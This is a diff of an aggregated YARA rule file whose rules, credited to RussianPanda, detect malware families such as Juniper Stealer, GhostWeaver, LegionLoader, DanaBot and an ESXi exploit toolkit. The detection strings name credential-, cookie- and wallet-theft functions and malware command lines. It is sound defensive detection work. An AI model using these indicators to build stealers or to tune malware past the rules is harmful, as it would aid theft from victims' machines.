-		logic_hash = "85577822ecb065a32fe9c0c3ce2e2d7892c263e6a21afc56a9f0a1dbe5218abe"
+		hash = "33ea72b46af7bb2ecc0775f7536d3259f34bd7a13e298cac66649ee694097c2e"
+		logic_hash = "649e2a5b018b79d3d8534baf8432924f7ee197f26aebbfd384dd613c31d1b035"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "[DEBUG MAIN SOCKS] Starting Init SOCKS"
-		$s2 = "fail send data to target"
-		$s3 = "serv disconnect"
-		$s4 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000"
+		$s1 = "frmgrb"
+		$s2 = "WebfakeRecords"
+		$s3 = "urlblocklist"
+		$s4 = "mscoree.dll"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Textshell : FILE
+rule RUSSIANPANDA_Win_Mal_Mmgrabber : FILE
 {
 	meta:
-		description = "Detects TextShell Obfsucator"
+		description = "Detects mmgrabber Plugin"
 		author = "RussianPanda"
-		id = "48fe49be-a76e-5e6c-a69f-acbe73f4d175"
-		date = "2025-10-31"
-		modified = "2025-11-02"
+		id = "9d16282e-0cf3-527c-89df-51ae0d156e70"
+		date = "2025-02-13"
+		modified = "2025-02-14"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/VanillaTempest/win_mal_TextShell.yar#L1-L13"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_mmgrabber.yar#L1-L14"
 		license_url = "N/A"
-		hash = "cf44aa11a17b3dad61cae715f4ea27c0cbf80732a1a7a1c530a5c9d3d183482a"
-		logic_hash = "c8f84d7160d8cb3b76d06170af09c921893b6f4cd073a10b399d8f51199cef40"
+		hash = "40ebd719aa66a88e261633887ed4e2c144bd11fbcc6f7793f9b32652cc5bf2d3"
+		logic_hash = "149c81b3c1a33933da0c181b8e8a90f40ba5fd8961d6340470790eb375c9695b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {41 8B 04 84 48 03 ?? EB}
-		$s2 = {41 3B ?? 74 ?? FF C3 3B 5D 18 72}
-		$s3 = {FF 15 ?? ?? ?? ?? 48 8B}
+		$s1 = "GrabDesktopWallets"
+		$s2 = "GrabChromeExtensions"
+		$s3 = "FindExodusFolder"
+		$s4 = "mscoree.dll"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #s3 > 1000
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Win_Mal_Mpxdropper : FILE
+rule RUSSIANPANDA_Win_Mal_Ghostweaver : FILE
 {
 	meta:
-		description = "Detects MpxDropper"
+		description = "Detects GhostWeaver backdoor"
 		author = "RussianPanda"
-		id = "26ee0a12-c727-5953-8ebb-dd8a8d772561"
-		date = "2024-03-01"
-		modified = "2024-03-01"
+		id = "febabd9a-b738-5ed8-b605-4bbef86ce8ac"
+		date = "2025-02-15"
+		modified = "2025-02-15"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MpxDropper/mal_win_MpxDropper.yar#L1-L11"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_GhostWeaver.yar#L1-L13"
 		license_url = "N/A"
-		hash = "3a44a45afbfe5fc7cdeb3723e05c4e892b079abdb7d1e8d6fc70496ef0a14d5d"
-		logic_hash = "e8d2672553c7f44e1cc177fad6596bd58b5c32a7541f91ce1207e6b21ef6e52d"
+		hash = "5051f0aa11da67e16797daa51992467ad45c5bf18dcd2e252e8aa63d3fce31bc"
+		logic_hash = "6901fa0e7d5a911a0029536ac38d9a2a248fa72126114b10ea941cc8b4329d12"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {43 3a 5c 55 73 65 72 73 5c 6d 70 78 31 36 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73}
+		$s1 = "$global:keystr"
+		$s2 = "stub"
+		$s3 = "ForEach-Object"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them and filesize < 1MB and @s3 > 100
 }
-rule RUSSIANPANDA_Pikabot_1 : FILE
+rule RUSSIANPANDA_Win_Mal_Juniperstealer : FILE
 {
 	meta:
-		description = "Detects PikaBot"
+		description = "Detects Juniper Stealer"
 		author = "RussianPanda"
-		id = "e740b821-69cc-5053-9f90-439b4364656f"
-		date = "2024-01-02"
-		modified = "2024-01-02"
-		reference = "https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PikaBot/Pikabot_1-2-2024.yar#L1-L16"
+		id = "d8ad9175-a226-5e09-a206-b3da42c1db42"
+		date = "2025-02-13"
+		modified = "2025-02-14"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_JuniperStealer.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "f2dd26c23aba72c2b6b959fb411381b7d3a7466f94bf5259f57e96e44d3ee153"
+		hash = "44dc2777ee8dd6d5cd8ebb10e71caf73b330940131417b5fca2b174a264e19e3"
+		logic_hash = "e3d05058bbb0e8e408f2b6cf24cb2462b6a3f237c3c464b891cda705b4968c02"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {8A 04 11 30 02 42 83 EE 01 75 F5 5E C3}
-		$s2 = {C0 E9 02 C0 E0 04 [13] C0 E2 06 02 D0}
-		$s3 = {8D 53 BF 80 FA 19 0F B6 C3}
+		$s1 = "OutlookDecryptPwd"
+		$s2 = "CookiesNew"
+		$s3 = "Cookies128"
+		$s4 = "mscoree.dll"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $s* ) and filesize < 500KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Meduzastealer : FILE
+rule RUSSIANPANDA_Mal_Msedge_Dll_Virusloader : FILE
 {
 	meta:
-		description = "Detects MeduzaStealer 1-2024"
+		description = "Detects malicious msedge.dll file"
 		author = "RussianPanda"
-		id = "6bc4c048-a32d-5a9c-b213-980c64d08d29"
-		date = "2024-01-01"
-		modified = "2024-01-01"
-		reference = "https://russianpanda.com/2023/06/28/Meduza-Stealer-or-The-Return-of-The-Infamous-Aurora-Stealer/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MeduzaStealer/MeduzaStealer_1-1-2024.yar#L1-L16"
+		id = "7139ee30-de9a-5ef0-a96f-2ab9c239c6ff"
+		date = "2024-01-19"
+		modified = "2024-01-19"
+		reference = "https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/virusloader/mal_msedge_dll_virusloader.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "0547e51abd04302c45f1319bc21046ade019bc98eb85d9cba67cb2109ff642eb"
+		hash = "ab2e3b07170ef1516af3af0d03388868"
+		logic_hash = "659fd5fa3121fec5bf4cceb6f3dea95bf4cbcde7441d6f11c35288d8ad75a803"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 57 69 6e 55 70 64 61 74 65 2e 65 78 65}
-		$s2 = {0f 57 ?? ?? ?? 00 00 66 0f 7f 85 ?? ?? 00 00}
-		$s3 = {48 8d 15 ?? ?? 05 00 49 8b cf}
-		$s4 = {48 8d 0d ?? ?? 06 00 ff 15 ?? ?? 06 00}
+		$s1 = {C6 85 ?? FE FF FF ?? C6}
+		$s2 = {C7 85 ?? FD FF FF}
+		$s3 = {BF 60 01 00 00 [18] 30 04 39 41}
 
 	condition:
-		3 of ( $s* ) and filesize < 1MB
+		uint16( 0 ) == 0x5A4D and all of ( $s* ) and #s1 > 30 and #s2 > 30 and filesize < 300KB
 }
-rule RUSSIANPANDA_Getshellplugin : FILE
+rule RUSSIANPANDA_Mal_Botnetfenix_Payload : FILE
 {
 	meta:
-		description = "Detects GetShell Plugin (client)"
+		description = "Detects BotnetFenix payload"
 		author = "RussianPanda"
-		id = "f20f1c80-a52a-5f3a-8bbd-915ef77e9850"
-		date = "2025-12-31"
-		modified = "2025-12-31"
+		id = "566bfae1-c43d-5bd6-adcf-faff32d8c325"
+		date = "2024-02-02"
+		modified = "2024-02-04"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ESXiExploitToolkit/win_mal_GetShellPlugin.yar#L1-L13"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/FenixBotnet/mal_BotnetFenix_Payload.yar#L1-L16"
 		license_url = "N/A"
-		hash = "4614346fc1ff74f057d189db45aa7dc25d6e7f3d9b68c287a409a53c86dca25e"
-		logic_hash = "758339dc10eab3ae0fd743568ba356e91d2902ad6c8228095322903bdc00af6e"
+		hash = "65a9575c50a96d04a3f649fe0f6b8ccd"
+		logic_hash = "27f423b509ad8de0f8389c7b3e3bfec2eeb10c964aa8c70bad47cc4334df1a5e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "InfDefaultInstall.exe .\\vsock.inf"
-		$s2 = "InfDefaultInstall.exe .\\vmci.inf"
-		$s3 = "invalid SERVER_CID:PORT"
+		$s1 = "tasks_register"
+		$s2 = "actionget_action"
+		$s3 = "Post Success"
+		$s4 = "Success Stealer"
+		$s5 = "Download and Execute task id"
+		$a = "_CorExeMain"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 4 of ( $s* ) and $a
 }
-rule RUSSIANPANDA_Vsockpuppet : FILE
+rule RUSSIANPANDA_Mal_Fenixbotnet_Jse
 {
 	meta:
-		description = "Detects VSOCKpuppet payload"
+		description = "Detects Fenix Botnet JSE downloader"
 		author = "RussianPanda"
-		id = "82ace9c6-5ca2-5665-8ed5-8fecfe54f12c"
-		date = "2025-12-31"
-		modified = "2025-12-31"
+		id = "00c6f8a6-c2e2-5b08-b332-b91371060bbe"
+		date = "2024-01-18"
+		modified = "2024-02-02"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ESXiExploitToolkit/linux_mal_VSOCKpuppet.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/FenixBotnet/mal_FenixBotnet_jse.yar#L1-L14"
 		license_url = "N/A"
-		hash = "c3f8da7599468c11782c2332497b9e5013d98a1030034243dfed0cf072469c89"
-		logic_hash = "5c83b3303b092372da8ecd7cb8457a37e3f53042cdf8463fc8837208d34f09b6"
+		hash = "a7fadf0050d4d0b2cefd808e16dfde69"
+		logic_hash = "848c00361fba60e63e8ec4098404e87d4ba2b11d8489ad16d49c20fc653a5e45"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "received command:%s"
-		$s2 = "MCISock_GetAFValue failed"
-		$s3 = "recv_response failed"
-		$s4 = "send_msg_len failed"
+		$s1 = {76 61 72 20 [0-30] 3D 20 22 66 22}
+		$s2 = {76 61 72 20 [0-30] 3D 20 22 75 22}
+		$s3 = {76 61 72 20 [0-30] 3D 20 22 6E 22}
+		$s4 = {6E 65 77 20 46 75 6E 63 74 69 6F 6E 28 64 65 63 6F 64 65 55 52 49 43 6F 6D 70 6F 6E 65 6E 74 28 [0-30] 29 29 2E 63 61 6C 6C 28 29}
 
 	condition:
-		uint32( 0 ) == 0x464C457F and all of them
+		all of ( $s* )
 }
-rule RUSSIANPANDA_MAESTRO : FILE
+rule RUSSIANPANDA_Mal_Asuka_Stealer : FILE
 {
 	meta:
-		description = "Detects MAESTRO payload"
+		description = "Detects AsukaStealer"
 		author = "RussianPanda"
-		id = "c7684ab1-c7ac-504e-9402-ef0bd0b664b9"
-		date = "2025-12-31"
-		modified = "2025-12-31"
+		id = "a718be5f-dc76-5610-9237-038a9719d7e5"
+		date = "2024-02-02"
+		modified = "2024-03-18"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ESXiExploitToolkit/win_mal_MAESTRO.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AsukaStealer/mal_asuka_stealer.yar#L1-L12"
 		license_url = "N/A"
-		hash = "37972a232ac6d8c402ac4531430967c1fd458b74a52d6d1990688d88956791a7"
-		logic_hash = "943a4508bae1a285efb05232de29463c3ca667c28fd97e0ec9fd2e88df76b6c0"
+		logic_hash = "7974e0de821ddcafd4f00b27d587108f0d80f8a231dd0db4d2be4fa6ab44fef4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "devcon.exe disable \"PCI\\VEN_15AD&DEV_0740\""
-		$s2 = "devcon.exe disable \"ROOT\\VMWVMCIHOSTDEV\""
-		$s3 = "Open SymbolicLink Failed" wide
-		$s4 = "Done!!!" ascii wide
+		$s1 = {32 14 3E E8 F6 81 00 00}
+		$s2 = {00 58 00 2D 00 43 00 6F 00 6E 00 66 00 69 00 67}
+		$s3 = {58 00 2D 00 49 00 6E 00 66 00 6F}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Mydriversys : FILE
+rule RUSSIANPANDA_Mal_Nitrogen : FILE
 {
 	meta:
-		description = "Detects the malicious driver - MyDriver.sys"
+		description = "Detects Nitrogen campaign"
 		author = "RussianPanda"
-		id = "9b97acfd-21e8-5974-9f95-ecf7c561fada"
-		date = "2025-12-31"
-		modified = "2025-12-31"
+		id = "9d591f87-47ec-54ea-b0ae-26a0542733a0"
+		date = "2024-02-04"
+		modified = "2024-02-04"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ESXiExploitToolkit/win_mal_MyDriverSYS.yar#L1-L13"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Nitrogen/mal_nitrogen.yar#L1-L15"
 		license_url = "N/A"
-		hash = "c3f8da7599468c11782c2332497b9e5013d98a1030034243dfed0cf072469c89"
-		logic_hash = "9eb5273dcd895aa861839119a7850461c52bb7f423301f7e0e03d8c382fa3ec9"
+		logic_hash = "642d5a16c7fb217a297bba683221de474eb028ac48ec8f52be897eaa056acb9b"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
 
 	strings:
-		$s1 = "SetGuestInfo  7 11111111"
-		$s2 = "found ESXi%d.%d build-%d"
-		$s3 = "current build is not surpported"
+		$s1 = {63 7C 77 7B F2 6B 6F C5}
+		$s2 = {52 09 6A D5 30 36 A5 38}
+		$s3 = {6F 72 69 67 69 6E 61 6C 5F 69 6E 73 74 61 6C 6C}
+		$s4 = {43 3A 5C 55 73 65 72 73 5C 50 75 62 6C 69 63 5C 44 6F 77 6E 6C 6F 61 64}
+		$s5 = {25 00 43 00 55 00 52 00 52 00 45 00 4E 00 54 00 5F 00 44 00 45 00 52 00 45 00 43 00 54 00 4F 00 52 00 59 00 25}
+		$s6 = {4E 69 74 72 6F 67 65 6E 54 61 72 67 65 74}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule RUSSIANPANDA_Peerblight : FILE
+rule RUSSIANPANDA_Garystealer : FILE
 {
 	meta:
-		description = "Detects PeerBlight backdoor"
+		description = "Detects GaryStealer 1-3-2024"
 		author = "RussianPanda"
-		id = "8fdae13c-0a81-517d-9f6d-667c5db59621"
-		date = "2025-12-07"
-		modified = "2025-12-07"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PeerBlight/linux_mal_PeerBlight.yar#L1-L16"
+		id = "4b0af30e-2cf1-539d-89fa-7e4e32cd6eab"
+		date = "2024-01-03"
+		modified = "2024-01-03"
+		reference = "https://cybersecurity.att.com/blogs/labs-research/behind-the-scenes-jaskagos-coordinated-strike-on-macos-and-windows"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/GaryStealer/garystealer-1-3-2024.yar#L1-L20"
 		license_url = "N/A"
-		hash = "a605a70d031577c83c093803d11ec7c1e29d2ad530f8e95d9a729c3818c7050d"
-		logic_hash = "5bc60656c333c63aa869c1c94bbb2aa2802c4132ab988a08b50aad146ca6a23e"
+		hash = "6efa29a0f9d112cfbb982f7d9c0ddfe395b0b0edb885c2d5409b33ad60ce1435"
+		logic_hash = "f71655d0cb237c08af9c298ec9eec1ae9bd1efd50e26d61afddf9056b6883a15"
 		score = 75
-		quality = 60
+		quality = 79
 		tags = "FILE"
 
 	strings:
-		$s1 = "/bin/systemd-daemon"
-		$s2 = "/lib/systemd/system/systemd-agent.service"
-		$s3 = "group"
-		$s4 = "tag"
-		$s5 = "arch"
-		$s6 = "softirq"
+		$s1 = {72 75 6e 74 69 6d 65 2e 67 6f 70 61 6e 69 63}
+		$s2 = {4c 6f 63 61 6c 20 49 50 20 41 64 64 72 65 73 73 65 73 3a 5b 70 69 63 6b 2d 66 69 72 73 74 2d 6c 62 20 25 70 5d}
+		$s3 = {70 65 72 73 69 73 74 61 6E 63 65 20 63 72 65 61 74 65 64}
+		$s4 = {C7 40 28 ?? 00 00 00}
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 5 of them
+		uint16( 0 ) == 0x5A4D and 3 of ( $s* ) and filesize < 20MB and #s4 > 2
 }
 rule RUSSIANPANDA_Purelogs_Stealer_Initial_Dropper : FILE
 {
@@ -168268,133 +168323,113 @@ rule RUSSIANPANDA_Purelogs_Stealer_Core : FILE
 	condition:
 		all of ( $s* ) and filesize < 5MB and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Win_Mal_Zloader : FILE
+rule RUSSIANPANDA_Legionloader : FILE
 {
 	meta:
-		description = "Detects Zloader and other Zloader modules that employ the same encryption"
+		description = "Detects LegionLoader core payload"
 		author = "RussianPanda"
-		id = "3f72e067-c82b-5c65-92c8-010955971d87"
-		date = "2024-03-10"
-		modified = "2024-03-10"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Zloader/win_mal_Zloader.yar#L1-L13"
+		id = "8ef86f65-543e-5491-8459-fd540e70fc0c"
+		date = "2024-10-05"
+		modified = "2024-12-30"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/LegionLoader/legionloader.yar#L1-L17"
 		license_url = "N/A"
-		logic_hash = "9ac9e8ca4a6f84e1bccac2292705ee6ebbc1595eb3f40ed777f7973e9bda7fc1"
+		hash = "3b630367b2942bd765f8a35bca47ea6b"
+		logic_hash = "c833b22a6e87f6289e723a51ac9eb02848a4868c73ca9f568f6450e53c41a657"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {8B 45 ?? 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 8B 45 ?? 99 F7 F9 8B 45 ?? 48 63 D2 48 8D 0D ?? ?? ?? 00 0F BE 0C 11 31 C8 88 C2 48 8B 45 F0 48 63 4D}
-		$s2 = {48 63 C9 44 0F B6 04 08 48 8B 45 E8 8B 4D D4 0F B6 14 08 44 31 C2 88 14 08 8B 45 D4}
-		$s3 = {B9 11 00 00 00 99 F7 F9 8B [0-20] 31 C8 88 C2}
-		$s4 = {8B 45 ?? BE 11 00 00 00 99 F7 [0-20] 83 F6 FF}
+		$s1 = "crypto_domain"
+		$s2 = "postback_url"
+		$s3 = "last_win_error"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and all of them and filesize < 500KB
 }
-rule RUSSIANPANDA_Win_Mal_Glorysprout_Stealer : FILE
+rule RUSSIANPANDA_Legionloader_Dropper : FILE
 {
 	meta:
-		description = "Detects GlorySprout Stealer"
+		description = "Detects malicious LegionLoader DLL dropper"
 		author = "RussianPanda"
-		id = "44c50f20-479e-5960-9ab9-97b9a17d7cbf"
-		date = "2024-03-16"
-		modified = "2024-03-16"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/GlorySprout/win_mal_GlorySprout_Stealer.yar#L1-L13"
+		id = "a1b04033-cfe0-5088-bfee-d08752e8840b"
+		date = "2024-09-23"
+		modified = "2024-09-23"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/LegionLoader/LegionLoader_dropper.yar#L1-L17"
 		license_url = "N/A"
-		hash = "8996c252fc41b7ec0ec73ce814e84136be6efef898822146c25af2330f4fd04a"
-		logic_hash = "c843f7924e69c1b9fc3676178aa630319fe25605deddcd73c4905c51cc97d7eb"
+		hash = "ef5b961ebc6167e728f9bf40e726ac71"
+		logic_hash = "0871a6a0ab2c405793e8a49e662ba41acdcc6c8afac315f290de2cc05abd39fa"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {25 0F 00 00 80 79 05 48 83 C8 F0 40}
-		$s2 = {8B 82 A4 00 00 00 8B F9 89 06 8D 4E 0C 8B 82 A8 00 00 00 89 46 04 0F B7 92 AC 00 00 00 89 56 08}
-		$s3 = {0F B6 06 C1 E7 04 03 F8 8B C7 25 00 00 00 F0 74 0B C1 E8 18}
+		$s1 = {48 03 CA [0-50] 33 D2 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9 FF 15}
+		$s2 = {44 30 3B 48 FF C3}
+		$s3 = {8B ?? 8B ?? 83 ?? 01 D1 ?? F7 ?? 81 ?? 20 83 B8 ED 8B}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #s1 > 100
+		uint16( 0 ) == 0x5A4D and all of them and filesize < 1MB
 }
-rule RUSSIANPANDA_Sentinel_Stealer
+rule RUSSIANPANDA_Danabot
 {
 	meta:
-		description = "Detects Sentinel Stealer"
+		description = "Detects DanaBot"
 		author = "RussianPanda"
-		id = "8a221d7b-8fa6-53cd-a3e8-63cc67285186"
-		date = "2024-01-19"
-		modified = "2024-01-19"
+		id = "804604d9-db3b-5678-ae0d-67f0e876c93e"
+		date = "2023-12-01"
+		modified = "2023-12-01"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SentinelStealer/sentinel_stealer.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/DanaBot/danabot_yara.yar#L1-L17"
 		license_url = "N/A"
-		hash = "3a540a8a81c5a5b452f154d7875423a3"
-		logic_hash = "b9d72848842ea4d26544633bb83fccd17239b28493bde3f73341eb2004d8ee0c"
+		logic_hash = "4968531f27fa1a8bc3fca536a04b75277adefc42addb9f1999c564510cbcb684"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = ""
 
 	strings:
-		$s1 = "Sentinel.SmallerEncryptedIcon" wide
-		$s2 = "SentinelSteals" wide
-		$s4 = "_CorExeMain"
-
-	condition:
-		all of them
-}
-
-rule RUSSIANPANDA_Workersdevbackdoor : FILE
-{
-	meta:
-		description = "Detects WorkersDevBackdoor"
-		author = "RussianPanda"
-		id = "725e0924-c108-5927-8d27-e4bc5b284883"
-		date = "2023-12-15"
-		modified = "2024-01-05"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/WorkersDevBackdoor/WorkDevBackdoor.yar#L3-L20"
-		license_url = "N/A"
-		logic_hash = "f92ad9dc657d87a47e539ea2ee896f9b86bb95e51a890a838c6e6b0efa5deb7d"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = {72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 20 00 7B 00 30 00 7D 00 20 00 7B 00 31 00 7D}
-		$s2 = {72 FB 00 00 70 72 13 01 00 70 28 20 00 00 0A 72 2D 01 00 70}
-		$s3 = {55 00 53 00 45 00 52 00 44 00 4F 00 4D 00 41 00 49 00 4E}
-		$s4 = {43 00 4F 00 4D 00 50 00 55 00 54 00 45 00 52 00 4E 00 41 00 4D 00 45}
+		$s1 = {55 8b ec 8a 45 08 34 4a 5d c2 04 00}
+		$s2 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 5C 00 53 00 65 00 61 00 4D 00 6F 00 6E 00 6B 00 65 00 79}
+		$s3 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 54 00 68 00 75 00 6E 00 64 00 65 00 72 00 62 00 69 00 72 00 64 00}
+		$s4 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 4F 00 52 00 4C 00 5C 00 57 00 69 00 6E 00 56 00 4E 00 43 00 33 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64}
+		$s5 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 45 00 78 00 63 00 69 00 74 00 65 00 5C 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 4D 00 65 00 73 00 73 00 65 00 6E 00 67 00 65 00 72 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64}
+		$a = {44 45 4C 50 48 49 43 4C 41 53 53}
 
 	condition:
-		3 of ( $s* ) and pe.imports ( "mscoree.dll" ) and filesize < 2MB
+		3 of ( $s* ) and $a
 }
-rule RUSSIANPANDA_Workersdevbackdoor_PS : FILE
+rule RUSSIANPANDA_Truecrypt_Crypter : FILE
 {
 	meta:
-		description = "Detects WorkersDevBackdoor PowerShell script"
+		description = "Detects TrueCrypt crypter"
 		author = "RussianPanda"
-		id = "d2b526c1-a9f5-57de-818c-99b02e778a0d"
-		date = "2023-12-15"
-		modified = "2023-12-15"
+		id = "3ecf9c2f-6205-5e55-83a5-2b4e3ba89f07"
+		date = "2024-01-06"
+		modified = "2024-01-06"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/WorkersDevBackdoor/WorkersDevBackdoor_PS.yar#L1-L18"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/TrueCrypt/truecrypt_crypter.yar#L1-L27"
 		license_url = "N/A"
-		logic_hash = "c71eed8fd7a44f3018150cc6ef55d10779093ed8e4c77fd9babcf9b1b9fadfda"
+		hash = "167637397fb45ea19bafcf208d8f27dceec82caa7ab19d40ecdb08eb1b7d4f60"
+		logic_hash = "68612c68053e9fb81d9616c04b04ac2e2cb685f3b7ed71f8b31e8f22e3a539e7"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1 = "sleep" wide
-		$s2 = "convertto-securestring" wide
-		$s3 = "System.Drawing.dll" wide
-		$s4 = "System.Web.Extensions.dll" wide
-		$s5 = "System.Windows.Forms.dll" wide
-		$s6 = "CSharp" wide
+		$s1_crpt1 = {77 69 6E 65 5F 67 65 74}
+		$s2_crpt1 = {49 3B 66 10 76}
+		$s2_crpt2 = {3B 55 48 89 E5 48 83 EC 10 90 8B 0D [22] E8 [3] FF}
+		$s3_crpt1 = {49 3B 66 10 76 43}
+		$s3_crpt2 = {55 48 89 E5 48 83 EC 10 [5] E8 [4] 48 85 FF 75 18}
+		$s4_crpt1 = {40 C0 EE 04 [16] 48 83}
+		$s4_crpt2 = {FA 20 [0-22] 48 83 FE 20}
+		$a_crpt = {61 2E 6F 75 74 2E 65 78 65 00 5F 63 67}
+		$s_crpt = {6F 5F 64 75 6D 6D 79 5F 65 78 70 6F 72 74}
 
 	condition:
-		all of ( $s* ) and filesize < 200KB
+		uint16( 0 ) == 0x5A4D and $s1_crpt1 and $s2_crpt1 and $s2_crpt2 and $s3_crpt1 and $s3_crpt2 and $s4_crpt1 and $s4_crpt2 and $a_crpt and $s_crpt and filesize < 7MB
 }
 rule RUSSIANPANDA_Easycrypter : FILE
 {
